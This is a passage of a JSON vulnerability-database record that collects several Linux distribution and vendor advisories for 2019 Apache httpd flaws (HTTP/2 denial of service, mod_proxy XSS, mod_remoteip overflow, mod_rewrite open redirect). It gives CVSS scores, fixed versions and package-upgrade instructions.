"https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/2PR3ITGMIPGWWX4VYKKICQKSZVW5QUW3/", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "gentoo": [{"lastseen": "2023-06-13T16:27:49", "description": "### Background\n\nThe Apache HTTP server is one of the most popular web servers on the Internet. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Apache. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nPlease review the referenced CVE identifiers for details.\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Apache users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-servers/apache-2.4.41\"", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2019-09-06T00:00:00", "type": "gentoo", "title": "Apache: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10081", "CVE-2019-10082", "CVE-2019-10092", "CVE-2019-10097", "CVE-2019-10098", "CVE-2019-9517"], "modified": "2019-09-06T00:00:00", "id": "GLSA-201909-04", "href": "https://security.gentoo.org/glsa/201909-04", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "slackware": [{"lastseen": "2023-06-13T16:22:43", "description": "New httpd packages are available for Slackware 14.0, 14.1, 14.2, and -current\nto fix security issues.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/httpd-2.4.43-i586-1_slack14.2.txz: Upgraded.\n This release contains security fixes (since 2.4.39) and improvements.\n For more information, see:\n https://vulners.com/cve/CVE-2019-10097\n https://vulners.com/cve/CVE-2019-9517\n https://vulners.com/cve/CVE-2019-10098\n https://vulners.com/cve/CVE-2019-10092\n https://vulners.com/cve/CVE-2019-10082\n https://vulners.com/cve/CVE-2019-10081\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/httpd-2.4.43-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/httpd-2.4.43-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/httpd-2.4.43-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/httpd-2.4.43-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/httpd-2.4.43-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/httpd-2.4.43-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/httpd-2.4.43-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/httpd-2.4.43-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.0 package:\n82514923da1d70757a7a11c62448a35a httpd-2.4.43-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\ndba615eebca1b35a68290450584b2904 httpd-2.4.43-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\n40043585801dfb6cc92368d47713c3f7 httpd-2.4.43-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\nc8c5a421aa3d7eb6a3a9adbf61363601 httpd-2.4.43-x86_64-1_slack14.1.txz\n\nSlackware 14.2 package:\ne7d94e11fa3a74dfad0697ee6f23f4cb httpd-2.4.43-i586-1_slack14.2.txz\n\nSlackware x86_64 14.2 package:\n48a798401f598149337c0791fe5da68b httpd-2.4.43-x86_64-1_slack14.2.txz\n\nSlackware -current package:\neb0f5d3c261b15b95948f5ab93285e5f n/httpd-2.4.43-i586-1.txz\n\nSlackware x86_64 -current package:\nb4169a14f1a39deca0c328b5dd083b30 n/httpd-2.4.43-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg httpd-2.4.43-i586-1_slack14.2.txz\n\nThen, restart Apache httpd:\n\n > /etc/rc.d/rc.httpd stop\n > /etc/rc.d/rc.httpd start", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2020-03-31T19:45:57", "type": "slackware", "title": "[slackware-security] httpd", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10081", "CVE-2019-10082", "CVE-2019-10092", "CVE-2019-10097", "CVE-2019-10098", "CVE-2019-9517"], "modified": "2020-03-31T19:45:57", "id": "SSA-2020-091-02", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2020&m=slackware-security.448035", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "mageia": [{"lastseen": "2023-06-13T15:33:08", "description": "The updated packages fix security vulnerabilities: Some HTTP/2 implementations are vulnerable to unconstrained interal data buffering, potentially leading to a denial of service. The attacker opens the HTTP/2 window so the peer can send without constraint; however, they leave the TCP window closed so the peer cannot actually write (many of) the bytes on the wire. The attacker then sends a stream of requests for a large response object. Depending on how the servers queue the responses, this can consume excess memory, CPU, or both. (CVE-2019-9517) HTTP/2 (2.4.20 through 2.4.39) very early pushes, for example configured with \"H2PushResource\", could lead to an overwrite of memory in the pushing request's pool, leading to crashes. The memory copied is that of the configured push link header values, not data supplied by the client. (CVE-2019-10081) In Apache HTTP Server 2.4.18-2.4.39, using fuzzed network input, the http/2 session handling could be made to read memory after being freed, during connection shutdown. (CVE-2019-10082) In Apache HTTP Server 2.4.0-2.4.39, a limited cross-site scripting issue was reported affecting the mod_proxy error page. An attacker could cause the link on the error page to be malformed and instead point to a page of their choice. This would only be exploitable where a server was set up with proxying enabled but was misconfigured in such a way that the Proxy Error page was displayed. (CVE-2019-10092) In Apache HTTP Server 2.4.32-2.4.39, when mod_remoteip was configured to use a trusted intermediary proxy server using the \"PROXY\" protocol, a specially crafted PROXY header could trigger a stack buffer overflow or NULL pointer deference. This vulnerability could only be triggered by a trusted proxy and not by untrusted HTTP clients. (CVE-2019-10097) In Apache HTTP server 2.4.0 to 2.4.39, Redirects configured with mod_rewrite that were intended to be self-referential might be fooled by encoded newlines and redirect instead to an unexpected URL within the request URL. (CVE-2019-10098) \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2019-12-25T19:08:41", "type": "mageia", "title": "Updated apache packages fix security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10081", "CVE-2019-10082", "CVE-2019-10092", "CVE-2019-10097", "CVE-2019-10098", "CVE-2019-9517"], "modified": "2019-12-25T19:08:41", "id": "MGASA-2019-0407", "href": "https://advisories.mageia.org/MGASA-2019-0407.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "osv": [{"lastseen": "2023-06-28T06:52:10", "description": "\nSeveral vulnerabilities have been found in the Apache HTTPD server.\n\n\n* [CVE-2019-9517](https://security-tracker.debian.org/tracker/CVE-2019-9517)\nJonathan Looney reported that a malicious client could perform a\n denial of service attack (exhausting h2 workers) by flooding a\n connection with requests and basically never reading responses on\n the TCP connection.\n* [CVE-2019-10081](https://security-tracker.debian.org/tracker/CVE-2019-10081)\nCraig Young reported that HTTP/2 PUSHes could lead to an overwrite\n of memory in the pushing request's pool, leading to crashes.\n* [CVE-2019-10082](https://security-tracker.debian.org/tracker/CVE-2019-10082)\nCraig Young reported that the HTTP/2 session handling could be made\n to read memory after being freed, during connection shutdown.\n* [CVE-2019-10092](https://security-tracker.debian.org/tracker/CVE-2019-10092)\nMatei Mal Badanoiu reported a limited cross-site scripting\n vulnerability in the mod\\_proxy error page.\n* [CVE-2019-10097](https://security-tracker.debian.org/tracker/CVE-2019-10097)\nDaniel McCarney reported that when mod\\_remoteip was configured to\n use a trusted intermediary proxy server using the PROXY protocol,\n a specially crafted PROXY header could trigger a stack buffer\n overflow or NULL pointer deference. This vulnerability could only be\n triggered by a trusted proxy and not by untrusted HTTP clients. The\n issue does not affect the stretch release.\n* [CVE-2019-10098](https://security-tracker.debian.org/tracker/CVE-2019-10098)\nYukitsugu Sasaki reported a potential open redirect vulnerability in\n the mod\\_rewrite module.\n\n\nFor the oldstable distribution (stretch), these problems have been fixed\nin version 2.4.25-3+deb9u8.\n\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 2.4.38-3+deb10u1.\n\n\nWe recommend that you upgrade your apache2 packages.\n\n\nFor the detailed security status of apache2 please refer to its security\ntracker page at:\n<https://security-tracker.debian.org/tracker/apache2>\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2019-08-26T00:00:00", "type": "osv", "title": "apache2 - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10081", "CVE-2019-10082", "CVE-2019-10092", "CVE-2019-10097", "CVE-2019-10098", "CVE-2019-9517"], "modified": "2023-06-28T06:51:08", "id": "OSV:DSA-4509-1", "href": "https://osv.dev/vulnerability/DSA-4509-1", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-06-28T06:52:15", "description": "\nSeveral vulnerabilities have been found in the Apache HTTPD server.\n\n\n* [CVE-2019-9517](https://security-tracker.debian.org/tracker/CVE-2019-9517)\nJonathan Looney reported that a malicious client could perform a\n denial of service attack (exhausting h2 workers) by flooding a\n connection with requests and basically never reading responses on\n the TCP connection.\n* [CVE-2019-10081](https://security-tracker.debian.org/tracker/CVE-2019-10081)\nCraig Young reported that HTTP/2 PUSHes could lead to an overwrite\n of memory in the pushing request's pool, leading to crashes.\n* [CVE-2019-10082](https://security-tracker.debian.org/tracker/CVE-2019-10082)\nCraig Young reported that the HTTP/2 session handling could be made\n to read memory after being freed, during connection shutdown.\n* [CVE-2019-10092](https://security-tracker.debian.org/tracker/CVE-2019-10092)\nMatei Mal Badanoiu reported a limited cross-site scripting\n vulnerability in the mod\\_proxy error page.\n* [CVE-2019-10097](https://security-tracker.debian.org/tracker/CVE-2019-10097)\nDaniel McCarney reported that when mod\\_remoteip was configured to\n use a trusted intermediary proxy server using the PROXY protocol,\n a specially crafted PROXY header could trigger a stack buffer\n overflow or NULL pointer deference. This vulnerability could only be\n triggered by a trusted proxy and not by untrusted HTTP clients. The\n issue does not affect the stretch release.\n* [CVE-2019-10098](https://security-tracker.debian.org/tracker/CVE-2019-10098)\nYukitsugu Sasaki reported a potential open redirect vulnerability in\n the mod\\_rewrite module.\n\n\nFor the oldstable distribution (stretch), these problems have been fixed\nin version 2.4.25-3+deb9u8.\n\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 2.4.38-3+deb10u1.\n\n\nWe recommend that you upgrade your apache2 packages.\n\n\nFor the detailed security status of apache2 please refer to its security\ntracker page at:\n<https://security-tracker.debian.org/tracker/apache2>\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2019-08-26T00:00:00", "type": "osv", "title": "apache2 - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10081", "CVE-2019-10082", "CVE-2019-10092", "CVE-2019-10097", "CVE-2019-10098", "CVE-2019-9517"], "modified": "2023-06-28T06:51:08", "id": "OSV:DSA-4509-3", "href": "https://osv.dev/vulnerability/DSA-4509-3", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-06-28T06:52:11", "description": "\nSeveral vulnerabilities have been found in the Apache HTTPD server.\n\n\n* [CVE-2019-9517](https://security-tracker.debian.org/tracker/CVE-2019-9517)\nJonathan Looney reported that a malicious client could perform a\n denial of service attack (exhausting h2 workers) by flooding a\n connection with requests and basically never reading responses on\n the TCP connection.\n* [CVE-2019-10081](https://security-tracker.debian.org/tracker/CVE-2019-10081)\nCraig Young reported that HTTP/2 PUSHes could lead to an overwrite\n of memory in the pushing request's pool, leading to crashes.\n* [CVE-2019-10082](https://security-tracker.debian.org/tracker/CVE-2019-10082)\nCraig Young reported that the HTTP/2 session handling could be made\n to read memory after being freed, during connection shutdown.\n* [CVE-2019-10092](https://security-tracker.debian.org/tracker/CVE-2019-10092)\nMatei Mal Badanoiu reported a limited cross-site scripting\n vulnerability in the mod\\_proxy error page.\n* [CVE-2019-10097](https://security-tracker.debian.org/tracker/CVE-2019-10097)\nDaniel McCarney reported that when mod\\_remoteip was configured to\n use a trusted intermediary proxy server using the PROXY protocol,\n a specially crafted PROXY header could trigger a stack buffer\n overflow or NULL pointer deference. This vulnerability could only be\n triggered by a trusted proxy and not by untrusted HTTP clients. The\n issue does not affect the stretch release.\n* [CVE-2019-10098](https://security-tracker.debian.org/tracker/CVE-2019-10098)\nYukitsugu Sasaki reported a potential open redirect vulnerability in\n the mod\\_rewrite module.\n\n\nFor the oldstable distribution (stretch), these problems have been fixed\nin version 2.4.25-3+deb9u8.\n\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 2.4.38-3+deb10u1.\n\n\nWe recommend that you upgrade your apache2 packages.\n\n\nFor the detailed security status of apache2 please refer to its security\ntracker page at:\n<https://security-tracker.debian.org/tracker/apache2>\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2019-08-26T00:00:00", "type": "osv", "title": "subversion - update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10081", "CVE-2019-10082", "CVE-2019-10092", "CVE-2019-10097", "CVE-2019-10098", "CVE-2019-9517"], "modified": "2023-06-28T06:51:08", "id": "OSV:DSA-4509-2", "href": "https://osv.dev/vulnerability/DSA-4509-2", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "kaspersky": [{"lastseen": "2023-06-13T16:41:45", "description": "### *Detect date*:\n08/14/2019\n\n### *Severity*:\nWarning\n\n### *Description*:\nMultiple vulnerabilities were found in Apache HTTP Server. Malicious users can exploit these vulnerabilities to cause denial of service, perform cross-site scripting attack, spoof user interface.\n\n### *Affected products*:\nApache HTTP Server earlier than 2.4.41\n\n### *Solution*:\nUpdate to the latest version \n[Download Apache HTTP Server](<https://httpd.apache.org/download.cgi>)\n\n### *Original advisories*:\n[Fixed in Apache HTTP Server 2.4.41](<https://httpd.apache.org/security/vulnerabilities_24.html#2.4.41>) \n\n\n### *Impacts*:\nDoS \n\n### *Related products*:\n[Apache HTTP Server](<https://threats.kaspersky.com/en/product/Apache-HTTP-Server/>)\n\n### *CVE-IDS*:\n[CVE-2019-10092](<https://vulners.com/cve/CVE-2019-10092>)4.3Warning \n[CVE-2019-10081](<https://vulners.com/cve/CVE-2019-10081>)5.0Critical \n[CVE-2019-10097](<https://vulners.com/cve/CVE-2019-10097>)6.0High \n[CVE-2019-10082](<https://vulners.com/cve/CVE-2019-10082>)6.4High \n[CVE-2019-9517](<https://vulners.com/cve/CVE-2019-9517>)7.8Critical \n[CVE-2019-10098](<https://vulners.com/cve/CVE-2019-10098>)5.8High", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2019-08-14T00:00:00", "type": "kaspersky", "title": "KLA12366 Multiple vulnerabilities in Apache HTTP Server", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10081", "CVE-2019-10082", "CVE-2019-10092", "CVE-2019-10097", "CVE-2019-10098", "CVE-2019-9517"], "modified": "2021-12-02T00:00:00", "id": "KLA12366", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12366/", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "redhat": [{"lastseen": "2023-08-04T12:28:04", "description": "The Apache HTTP Server is a powerful, efficient, and extensible web server. The httpd24 packages provide a recent stable release of version 2.4 of the Apache HTTP Server, along with the mod_auth_kerb module.\n\nSecurity Fix(es):\n\n* httpd: mod_session_cookie does not respect expiry time (CVE-2018-17199)\n\n* httpd: mod_auth_digest: access control bypass due to race condition (CVE-2019-0217)\n\n* httpd: null-pointer dereference in mod_remoteip (CVE-2019-10097)\n\n* httpd: mod_http2: DoS via slow, unneeded request bodies (CVE-2018-17189)\n\n* httpd: URL normalization inconsistency (CVE-2019-0220)\n\n* httpd: limited cross-site scripting in mod_proxy error page (CVE-2019-10092)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nBug Fix(es):\n\n* `ExtendedStatus Off` directive when using mod_systemd causes systemctl to hang (BZ#1669213)\n\n* httpd can not be started with mod_md enabled (BZ#1673019)\n\n* Rebuild metapackage with latest scl-utils (BZ#1696527)\n\n* fix a regression introduced in r1740928 (BZ#1707636)\n\n* duplicated cookie in Apache httpd with mod_session (BZ#1725922)\n\n* Unexpected OCSP in proxy SSL connection (BZ#1744120)\n\nEnhancement(s):\n\n* RFE: updated collection for httpd 2.4 (BZ#1726706)\n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat Software Collections 3.4 Release Notes linked from the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-12-10T06:29:23", "type": "redhat", "title": "(RHSA-2019:4126) Moderate: httpd24-httpd security, bug fix, and enhancement update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-17189", "CVE-2018-17199", "CVE-2019-0217", "CVE-2019-0220", "CVE-2019-10092", "CVE-2019-10097"], "modified": "2019-12-10T07:15:59", "id": "RHSA-2019:4126", "href": "https://access.redhat.com/errata/RHSA-2019:4126", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-08-04T12:28:04", "description": "This release adds the new Apache HTTP Server 2.4.37 Service Pack 2 packages that are part of the JBoss Core Services offering.\n\nThis release serves as a replacement for Red Hat JBoss Core Services Pack Apache Server 2.4.37 Service Pack 1 and includes bug fixes and enhancements. Refer to the Release Notes for information on the most significant bug fixes and enhancements included in this release.\n\nSecurity Fix(es):\n\n* openssl: side-channel weak encryption vulnerability (CVE-2019-1547)\n\n* httpd: memory corruption on early pushes (CVE-2019-10081)\n\n* httpd: read-after-free in h2 connection shutdown (CVE-2019-10082)\n\n* httpd: null-pointer dereference in mod_remoteip (CVE-2019-10097)\n\n* openssl: information disclosure in fork() (CVE-2019-1549)\n\n* openssl: information disclosure in PKCS7_dataDecode and CMS_decrypt_set1_pkey (CVE-2019-1563)\n\n* httpd: limited cross-site scripting in mod_proxy error page (CVE-2019-10092)\n\n* httpd: mod_rewrite potential open redirect (CVE-2019-10098)\n\n* httpd: mod_rewrite configurations vulnerable to open redirect(CVE-2020-1927)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2020-04-06T19:02:25", "type": "redhat", "title": "(RHSA-2020:1337) Moderate: Red Hat JBoss Core Services Apache HTTP Server 2.4.37 SP2 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10081", "CVE-2019-10082", "CVE-2019-10092", "CVE-2019-10097", "CVE-2019-10098", "CVE-2019-1547", "CVE-2019-1549", "CVE-2019-1563", "CVE-2020-1927"], "modified": "2020-04-22T13:57:51", "id": "RHSA-2020:1337", "href": "https://access.redhat.com/errata/RHSA-2020:1337", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2023-08-04T12:28:04", "description": "Red Hat JBoss Core Services is a set of supplementary software for Red Hat JBoss middleware products. This software, such as Apache HTTP Server, is common to multiple JBoss middleware products, and is packaged under Red Hat JBoss Core Services to allow for faster distribution of updates, and for a more consistent update experience.\n\nThis release adds the new Apache HTTP Server 2.4.37 Service Pack 2 packages that are part of the JBoss Core Services offering.\n\nThis release serves as a replacement for Red Hat JBoss Core Services Pack Apache Server 2.4.37 Service Pack 1 and includes bug fixes and enhancements. Refer to the Release Notes for information on the most significant bug fixes and enhancements included in this release.\n\nSecurity Fix(es):\n\n* openssl: side-channel weak encryption vulnerability (CVE-2019-1547)\n\n* httpd: memory corruption on early pushes (CVE-2019-10081)\n\n* httpd: read-after-free in h2 connection shutdown (CVE-2019-10082)\n\n* httpd: null-pointer dereference in mod_remoteip (CVE-2019-10097)\n\n* openssl: information disclosure in fork() (CVE-2019-1549)\n\n* openssl: information disclosure in PKCS7_dataDecode and CMS_decrypt_set1_pkey (CVE-2019-1563)\n\n* httpd: limited cross-site scripting in mod_proxy error page (CVE-2019-10092)\n\n* httpd: mod_rewrite potential open redirect (CVE-2019-10098)\n\n* httpd: mod_rewrite configurations vulnerable to open redirect(CVE-2020-1927)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": 